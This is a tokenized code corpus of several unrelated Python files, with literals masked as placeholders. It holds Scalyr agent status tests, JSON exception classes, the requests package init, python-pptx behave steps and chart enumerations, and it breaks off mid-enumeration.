AutoFlushingRotatingFileHandler <EOL> import json_lib <EOL> import monitor_utils <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> __author__ = '<STR_LIT>' <EOL> class JsonConversionException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message ) : <EOL> Exception . __init__ ( self , message ) <EOL> class JsonMissingFieldException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message ) : <EOL> Exception . __init__ ( self , message ) <EOL> class JsonParseException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message , position , line_number ) : <EOL> self . position = position <EOL> self . line_number = line_number <EOL> self . raw_message = message <EOL> position_message = "<STR_LIT>" % ( line_number , <EOL> position ) <EOL> Exception . __init__ ( self , message + position_message ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import cStringIO <EOL> from scalyr_agent . agent_status import OverallStats , AgentStatus , ConfigStatus , LogProcessorStatus , MonitorStatus <EOL> from scalyr_agent . agent_status import CopyingManagerStatus , MonitorManagerStatus , LogMatcherStatus , report_status <EOL> from scalyr_agent . test_base import ScalyrTestCase <EOL> class TestOverallStats ( ScalyrTestCase ) : <EOL> def test_read_file_as_json ( self ) : <EOL> a = OverallStats ( ) <EOL> b = OverallStats ( ) <EOL> a . total_bytes_copied = <NUM_LIT:1> <EOL> a . total_bytes_skipped = <NUM_LIT:2> <EOL> a . total_bytes_subsampled = <NUM_LIT:3> <EOL> a . total_bytes_failed = <NUM_LIT:4> <EOL> a . total_redactions = <NUM_LIT:5> <EOL> a . total_copy_requests_errors = <NUM_LIT:6> <EOL> a . total_monitor_reported_lines = <NUM_LIT:7> <EOL> a . total_monitor_errors = <NUM_LIT:8> <EOL> a . total_requests_sent = <NUM_LIT:1> <EOL> a . total_requests_failed = <NUM_LIT:2> <EOL> a . total_request_bytes_sent = <NUM_LIT:3> <EOL> a . total_response_bytes_received = <NUM_LIT:4> <EOL> a . total_request_latency_secs = <NUM_LIT:5> <EOL> a . total_connections_created = <NUM_LIT:6> <EOL> b . total_bytes_copied = <NUM_LIT:9> <EOL> b . total_bytes_skipped = <NUM_LIT:10> <EOL> b . total_bytes_subsampled = <NUM_LIT:11> <EOL> b . total_bytes_failed = <NUM_LIT:12> <EOL> b . total_redactions = <NUM_LIT> <EOL> b . total_copy_requests_errors = <NUM_LIT> <EOL> b . total_monitor_reported_lines = <NUM_LIT:15> <EOL> b . total_monitor_errors = <NUM_LIT:16> <EOL> b . total_requests_sent = <NUM_LIT:7> <EOL> b . total_requests_failed = <NUM_LIT:8> <EOL> b . total_request_bytes_sent = <NUM_LIT:9> <EOL> b . total_response_bytes_received = <NUM_LIT:10> <EOL> b . total_request_latency_secs = <NUM_LIT:11> <EOL> b . total_connections_created = <NUM_LIT:12> <EOL> c = a + b <EOL> self . assertEquals ( c . total_bytes_copied , <NUM_LIT:10> ) <EOL> self . assertEquals ( c . total_bytes_skipped , <NUM_LIT:12> ) <EOL> self . assertEquals ( c . total_bytes_subsampled , <NUM_LIT> ) <EOL> self . assertEquals ( c . total_bytes_failed , <NUM_LIT:16> ) <EOL> self . assertEquals ( c . total_redactions , <NUM_LIT> ) <EOL> self . assertEquals ( c . total_copy_requests_errors , <NUM_LIT:20> ) <EOL> self . assertEquals ( c . total_monitor_reported_lines , <NUM_LIT> ) <EOL> self . assertEquals ( c . total_monitor_errors , <NUM_LIT> ) <EOL> self . assertEquals ( c . total_requests_sent , <NUM_LIT:8> ) <EOL> self . assertEquals ( c . total_requests_failed , <NUM_LIT:10> ) <EOL> self . assertEquals ( c . total_request_bytes_sent , <NUM_LIT:12> ) <EOL> self . assertEquals ( c . total_response_bytes_received , <NUM_LIT> ) <EOL> self . assertEquals ( c . total_request_latency_secs , <NUM_LIT:16> ) <EOL> self . assertEquals ( c . total_connections_created , <NUM_LIT> ) <EOL> class TestReportStatus ( ScalyrTestCase ) : <EOL> def setUp ( self ) : <EOL> self . time = <NUM_LIT> <EOL> self . status = AgentStatus ( ) <EOL> self . status . launch_time = self . time - <NUM_LIT> <EOL> self . status . log_path = '<STR_LIT>' <EOL> self . status . scalyr_server = '<STR_LIT>' <EOL> self . status . server_host = '<STR_LIT>' <EOL> self . status . user = '<STR_LIT:root>' <EOL> self . status . version = '<STR_LIT>' <EOL> config_status = ConfigStatus ( ) <EOL> self . status . config_status = config_status <EOL> config_status . last_read_time = self . time - <NUM_LIT> <EOL> config_status . last_check_time = self . time <EOL> config_status . last_good_read = self . time - <NUM_LIT> <EOL> config_status . path = '<STR_LIT>' <EOL> config_status . status = '<STR_LIT>' <EOL> config_status . additional_paths = [ '<STR_LIT>' ] <EOL> copying_status = CopyingManagerStatus ( ) <EOL> self . status . copying_manager_status = copying_status <EOL> copying_status . last_attempt_size = <NUM_LIT> <EOL> copying_status . last_attempt_time = self . time - <NUM_LIT> <EOL> copying_status . last_response_status = '<STR_LIT:success>' <EOL> copying_status . total_errors = <NUM_LIT:0> <EOL> copying_status . total_bytes_uploaded = <NUM_LIT> <EOL> copying_status . last_success_time = self . time - <NUM_LIT> <EOL> log_matcher = LogMatcherStatus ( ) <EOL> copying_status . log_matchers . append ( log_matcher ) <EOL> log_matcher . is_glob = False <EOL> log_matcher . last_check_time = self . time - <NUM_LIT:10> <EOL> log_matcher . log_path = '<STR_LIT>' <EOL> log_matcher = LogMatcherStatus ( ) <EOL> copying_status . log_matchers . append ( log_matcher ) <EOL> log_matcher . is_glob = False <EOL> log_matcher . last_check_time = self . time - <NUM_LIT:10> <EOL> log_matcher . log_path = '<STR_LIT>' <EOL> process_status = LogProcessorStatus ( ) <EOL> log_matcher . log_processors_status . append ( process_status ) <EOL> process_status . log_path = '<STR_LIT>' <EOL> process_status . last_scan_time = self . time - <NUM_LIT> <EOL> process_status . total_bytes_copied = <NUM_LIT> <EOL> process_status . total_bytes_pending = <NUM_LIT> <EOL> process_status . total_bytes_skipped = <NUM_LIT:12> <EOL> process_status . total_bytes_failed = <NUM_LIT> <EOL> process_status . total_bytes_dropped_by_sampling = <NUM_LIT:0> <EOL> process_status . total_lines_copied = <NUM_LIT> <EOL> process_status . total_lines_dropped_by_sampling = <NUM_LIT:0> <EOL> process_status . total_redactions = <NUM_LIT:0> <EOL> log_matcher = LogMatcherStatus ( ) <EOL> copying_status . log_matchers . append ( log_matcher ) <EOL> log_matcher . is_glob = True <EOL> log_matcher . last_check_time = self . time - <NUM_LIT:10> <EOL> log_matcher . log_path = '<STR_LIT>' <EOL> process_status = LogProcessorStatus ( ) <EOL> log_matcher . log_processors_status . append ( process_status ) <EOL> process_status . log_path = '<STR_LIT>' <EOL> process_status . last_scan_time = self . time - <NUM_LIT> <EOL> process_status . total_bytes_copied = <NUM_LIT> <EOL> process_status . total_bytes_pending = <NUM_LIT> <EOL> process_status . total_bytes_skipped = <NUM_LIT:12> <EOL> process_status . total_bytes_failed = <NUM_LIT> <EOL> process_status . total_bytes_dropped_by_sampling = <NUM_LIT:0> <EOL> process_status . total_lines_copied = <NUM_LIT> <EOL> process_status . total_lines_dropped_by_sampling = <NUM_LIT:0> <EOL> process_status . total_redactions = <NUM_LIT:0> <EOL> process_status = LogProcessorStatus ( ) <EOL> log_matcher . log_processors_status . append ( process_status ) <EOL> process_status . log_path = '<STR_LIT>' <EOL> process_status . last_scan_time = self . time - <NUM_LIT> <EOL> process_status . total_bytes_copied = <NUM_LIT> <EOL> process_status . total_bytes_pending = <NUM_LIT> <EOL> process_status . total_bytes_skipped = <NUM_LIT:12> <EOL> process_status . total_bytes_failed = <NUM_LIT> <EOL> process_status . total_bytes_dropped_by_sampling = <NUM_LIT:5> <EOL> process_status . total_lines_copied = <NUM_LIT> <EOL> process_status . total_lines_dropped_by_sampling = <NUM_LIT:10> <EOL> process_status . total_redactions = <NUM_LIT:10> <EOL> log_matcher = LogMatcherStatus ( ) <EOL> copying_status . log_matchers . append ( log_matcher ) <EOL> log_matcher . is_glob = True <EOL> log_matcher . last_check_time = self . time - <NUM_LIT:10> <EOL> log_matcher . log_path = '<STR_LIT>' <EOL> monitor_manager = MonitorManagerStatus ( ) <EOL> self . status . monitor_manager_status = monitor_manager <EOL> monitor_manager . total_alive_monitors = <NUM_LIT:2> <EOL> monitor_status = MonitorStatus ( ) <EOL> monitor_manager . monitors_status . append ( monitor_status ) <EOL> monitor_status . is_alive = True <EOL> monitor_status . monitor_name = '<STR_LIT>' <EOL> monitor_status . reported_lines = <NUM_LIT:50> <EOL> monitor_status . errors = <NUM_LIT:2> <EOL> monitor_status = MonitorStatus ( ) <EOL> monitor_manager . monitors_status . append ( monitor_status ) <EOL> monitor_status . is_alive = True <EOL> monitor_status . monitor_name = '<STR_LIT>' <EOL> monitor_status . reported_lines = <NUM_LIT:20> <EOL> monitor_status . errors = <NUM_LIT:0> <EOL> monitor_status = MonitorStatus ( ) <EOL> monitor_manager . monitors_status . append ( monitor_status ) <EOL> monitor_status . is_alive = False <EOL> monitor_status . monitor_name = '<STR_LIT>' <EOL> monitor_status . reported_lines = <NUM_LIT:20> <EOL> monitor_status . errors = <NUM_LIT> <EOL> def test_basic ( self ) : <EOL> output = cStringIO . StringIO ( ) <EOL> report_status ( output , self . status , self . time ) <EOL> expected_output = """<STR_LIT>""" <EOL> self . assertEquals ( expected_output , output . getvalue ( ) ) <EOL> def test_bad_config ( self ) : <EOL> self . status . config_status . last_error = '<STR_LIT>' <EOL> output = cStringIO . StringIO ( ) <EOL> report_status ( output , self . status , self . time ) <EOL> expected_output = """<STR_LIT>""" <EOL> self . assertEquals ( expected_output , output . getvalue ( ) ) <EOL> def test_bad_copy_response ( self ) : <EOL> self . status . copying_manager_status . last_response = '<STR_LIT>' <EOL> self . status . copying_manager_status . last_response_status = '<STR_LIT:error>' <EOL> self . status . copying_manager_status . total_errors = <NUM_LIT:5> <EOL> output = cStringIO . StringIO ( ) <EOL> report_status ( output , self . status , self . time ) <EOL> expected_output = """<STR_LIT>""" <EOL> self . assertEquals ( expected_output , output . getvalue ( ) ) </s>
<s> """<STR_LIT>""" <EOL> __title__ = '<STR_LIT>' <EOL> __version__ = '<STR_LIT>' <EOL> __build__ = <NUM_LIT> <EOL> __author__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> __copyright__ = '<STR_LIT>' <EOL> try : <EOL> from . packages . urllib3 . contrib import pyopenssl <EOL> pyopenssl . inject_into_urllib3 ( ) <EOL> except ImportError : <EOL> pass <EOL> from . import utils <EOL> from . models import Request , Response , PreparedRequest <EOL> from . api import request , get , head , post , patch , put , delete , options <EOL> from . sessions import session , Session <EOL> from . status_codes import codes <EOL> from . exceptions import ( <EOL> RequestException , Timeout , URLRequired , <EOL> TooManyRedirects , HTTPError , ConnectionError , <EOL> FileModeWarning , ConnectTimeout , ReadTimeout <EOL> ) <EOL> import logging <EOL> try : <EOL> from logging import NullHandler <EOL> except ImportError : <EOL> class NullHandler ( logging . Handler ) : <EOL> def emit ( self , record ) : <EOL> pass <EOL> logging . getLogger ( __name__ ) . addHandler ( NullHandler ( ) ) <EOL> import warnings <EOL> warnings . simplefilter ( '<STR_LIT:default>' , FileModeWarning , append = True ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from behave import given , then <EOL> from pptx import Presentation <EOL> from pptx . enum . shapes import PP_PLACEHOLDER <EOL> from pptx . parts . slidelayout import SlideLayout <EOL> from pptx . parts . slidemaster import ( <EOL> _MasterPlaceholders , _MasterShapeTree , _SlideLayouts <EOL> ) <EOL> from pptx . shapes . base import BaseShape <EOL> from pptx . shapes . placeholder import MasterPlaceholder <EOL> from helpers import test_pptx <EOL> @ given ( '<STR_LIT>' ) <EOL> def given_master_placeholder_collection ( context ) : <EOL> prs = Presentation ( test_pptx ( '<STR_LIT>' ) ) <EOL> context . master_placeholders = prs . slide_master . placeholders <EOL> @ given ( '<STR_LIT>' ) <EOL> def given_master_shape_collection_containing_two_shapes ( context ) : <EOL> prs = Presentation ( test_pptx ( '<STR_LIT>' ) ) <EOL> context . master_shapes = prs . slide_master . shapes <EOL> @ given ( '<STR_LIT>' ) <EOL> def given_master_having_two_placeholders ( context ) : <EOL> prs = Presentation ( test_pptx ( '<STR_LIT>' ) ) <EOL> context . slide_master = prs . slide_master <EOL> @ given ( '<STR_LIT>' ) <EOL> def given_slide_master_having_two_shapes ( context ) : <EOL> prs = Presentation ( test_pptx ( '<STR_LIT>' ) ) <EOL> context . slide_master = prs . slide_master <EOL> @ given ( '<STR_LIT>' ) <EOL> def given_slide_master_having_two_layouts ( context ) : <EOL> prs = Presentation ( test_pptx ( '<STR_LIT>' ) ) <EOL> context . slide_master = prs . slide_master <EOL> @ given ( '<STR_LIT>' ) <EOL> def given_slide_layout_collection_containing_two_layouts ( context ) : <EOL> prs = Presentation ( test_pptx ( '<STR_LIT>' ) ) <EOL> context . slide_layouts = prs . slide_master . slide_layouts <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_access_master_placeholder_by_index ( context ) : <EOL> master_placeholders = context . master_placeholders <EOL> for idx in range ( <NUM_LIT:2> ) : <EOL> master_placeholder = master_placeholders [ idx ] <EOL> assert isinstance ( master_placeholder , MasterPlaceholder ) <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_access_master_placeholder_by_type ( context ) : <EOL> master_placeholders = context . master_placeholders <EOL> title_placeholder = master_placeholders . get ( PP_PLACEHOLDER . TITLE ) <EOL> body_placeholder = master_placeholders . get ( PP_PLACEHOLDER . BODY ) <EOL> assert title_placeholder . _element is master_placeholders [ <NUM_LIT:0> ] . _element <EOL> assert body_placeholder . _element is master_placeholders [ <NUM_LIT:1> ] . _element <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_access_master_shape_by_index ( context ) : <EOL> master_shapes = context . master_shapes <EOL> for idx in range ( <NUM_LIT:2> ) : <EOL> master_shape = master_shapes [ idx ] <EOL> assert isinstance ( master_shape , BaseShape ) <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_access_slide_layout_by_index ( context ) : <EOL> slide_layouts = context . slide_layouts <EOL> for idx in range ( <NUM_LIT:2> ) : <EOL> slide_layout = slide_layouts [ idx ] <EOL> assert isinstance ( slide_layout , SlideLayout ) <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_access_placeholder_collection_of_slide_master ( context ) : <EOL> slide_master = context . slide_master <EOL> master_placeholders = slide_master . placeholders <EOL> msg = '<STR_LIT>' <EOL> assert isinstance ( master_placeholders , _MasterPlaceholders ) , msg <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_access_shape_collection_of_slide_master ( context ) : <EOL> slide_master = context . slide_master <EOL> master_shapes = slide_master . shapes <EOL> msg = '<STR_LIT>' <EOL> assert isinstance ( master_shapes , _MasterShapeTree ) , msg <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_access_slide_layouts_of_slide_master ( context ) : <EOL> slide_master = context . slide_master <EOL> slide_layouts = slide_master . slide_layouts <EOL> msg = '<STR_LIT>' <EOL> assert isinstance ( slide_layouts , _SlideLayouts ) , msg <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_iterate_over_the_master_placeholders ( context ) : <EOL> master_placeholders = context . master_placeholders <EOL> actual_count = <NUM_LIT:0> <EOL> for master_placeholder in master_placeholders : <EOL> actual_count += <NUM_LIT:1> <EOL> assert isinstance ( master_placeholder , MasterPlaceholder ) <EOL> assert actual_count == <NUM_LIT:2> <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_iterate_over_the_master_shapes ( context ) : <EOL> master_shapes = context . master_shapes <EOL> actual_count = <NUM_LIT:0> <EOL> for master_shape in master_shapes : <EOL> actual_count += <NUM_LIT:1> <EOL> assert isinstance ( master_shape , BaseShape ) <EOL> assert actual_count == <NUM_LIT:2> <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_iterate_over_the_slide_layouts ( context ) : <EOL> slide_layouts = context . slide_layouts <EOL> actual_count = <NUM_LIT:0> <EOL> for slide_layout in slide_layouts : <EOL> actual_count += <NUM_LIT:1> <EOL> assert isinstance ( slide_layout , SlideLayout ) <EOL> assert actual_count == <NUM_LIT:2> <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_len_of_master_shape_collection_is_2 ( context ) : <EOL> slide_master = context . slide_master <EOL> master_shapes = slide_master . shapes <EOL> assert len ( master_shapes ) == <NUM_LIT:2> , ( <EOL> '<STR_LIT>' % len ( master_shapes ) <EOL> ) <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_len_of_placeholder_collection_is_2 ( context ) : <EOL> slide_master = context . slide_master <EOL> master_placeholders = slide_master . placeholders <EOL> assert len ( master_placeholders ) == <NUM_LIT:2> , ( <EOL> '<STR_LIT>' % <EOL> len ( master_placeholders ) <EOL> ) <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_len_of_slide_layout_collection_is_2 ( context ) : <EOL> slide_master = context . slide_master <EOL> slide_layouts = slide_master . slide_layouts <EOL> assert len ( slide_layouts ) == <NUM_LIT:2> , ( <EOL> '<STR_LIT>' % len ( slide_layouts ) <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from . base import ( <EOL> alias , Enumeration , EnumMember , ReturnValueOnlyEnumMember , <EOL> XmlEnumeration , XmlMappedEnumMember <EOL> ) <EOL> class XL_CHART_TYPE ( Enumeration ) : <EOL> """<STR_LIT>""" <EOL> __ms_name__ = '<STR_LIT>' <EOL> __url__ = ( <EOL> '<STR_LIT>' <EOL> ) <EOL> __members__ = ( <EOL> EnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:15> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:100> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:64> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:5> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> ) <EOL> @ alias ( '<STR_LIT>' ) <EOL> class XL_DATA_LABEL_POSITION ( XmlEnumeration ) : <EOL> """<STR_LIT>""" <EOL> __ms_name__ = '<STR_LIT>' <EOL> __url__ = ( <EOL> '<STR_LIT>' <EOL> ) <EOL> __members__ = ( <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT:t>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT:b>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:5> , '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:3> , '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT:l>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> ReturnValueOnlyEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:6> , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:2> , '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT:r>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> ) <EOL> class XL_LEGEND_POSITION ( XmlEnumeration ) : <EOL> """<STR_LIT>""" <EOL> __ms_name__ = '<STR_LIT>' <EOL> __url__ = ( <EOL> '<STR_LIT>' <EOL> ) <EOL> __members__ = ( <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT:b>' , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:2> , '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> ReturnValueOnlyEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT:l>' , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT:r>' , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT:t>' , '<STR_LIT>' <EOL> ) , <EOL> ) <EOL> class XL_TICK_MARK ( XmlEnumeration ) : <EOL> """<STR_LIT>""" <EOL> __ms_name__ = '<STR_LIT>' <EOL> __url__ = ( <EOL> '<STR_LIT>' <EOL> ) <EOL> __members__ = ( <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , '<STR_LIT>' 